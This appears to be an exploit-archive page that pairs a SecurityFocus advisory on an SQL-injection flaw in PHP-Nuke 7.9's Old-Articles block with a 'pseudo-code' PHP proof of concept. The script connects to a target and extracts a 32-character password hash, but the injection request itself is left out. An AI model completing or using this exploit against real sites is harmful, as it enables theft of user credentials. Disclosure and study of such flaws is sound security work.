40 lines
No EOL
1.1 KiB
PHP
40 lines
No EOL
1.1 KiB
PHP
source: http://www.securityfocus.com/bid/22037/info
|
|
|
|
PHP-Nuke is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
|
|
|
|
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database implementation.
|
|
|
|
PHP-Nuke 7.9 and prior versions are vulnerable; other versions may also be affected.
|
|
|
|
<?
|
|
/*
|
|
|
|
Neo Security Team - Pseudo-Code Proof of Concept Exploit
|
|
PHP-Nuke <= 7.9 Old-Articles Block "cat" SQL Injection vulnerability
|
|
|
|
http://www.neosecurityteam.net
|
|
Paisterist
|
|
|
|
*/
|
|
set_time_limit(0);
|
|
$host="localhost";
|
|
$path="/phpnuke/";
|
|
$port="80";
|
|
$fp = fsockopen($host, $port, $errno, $errstr, 30);
|
|
|
|
if ($fp) {
|
|
/* we put the GET request on $p variable, with "cid" with the
|
|
malicious code and "categories" set to 1. */
|
|
|
|
fwrite($fp, $p);
|
|
|
|
while (!feof($fp)) {
|
|
$content .= fread($fp, 4096);
|
|
}
|
|
|
|
preg_match("/([a-z0-9]{32})/", $content, $matches);
|
|
|
|
if ($matches[0])
|
|
print "<b>Hash: </b>".$matches[0];
|
|
}
|
|
?>
|